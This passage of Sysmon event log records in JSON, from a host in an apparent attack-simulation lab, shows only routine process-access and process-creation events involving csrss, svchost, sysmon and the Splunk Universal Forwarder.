ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-001030580C00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7413,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.413\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010FC7E0D00}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.413","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010FC7E0D00}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7414,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nProcessGuid: {41C8662E-2254-5F25-0000-0010F5810D00}\r\nProcessId: 2560\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","ProcessGuid":"{41C8662E-2254-5F25-0000-0010F5810D00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7415,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010F5810D00}\r\nTargetProcessId: 2560\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010F5810D00}","TargetProcessId":"2560","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7416,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010F5810D00}\r\nTargetProcessId: 2560\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010F5810D00}","TargetProcessId":"2560","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7417,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7418,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7419,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7420,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
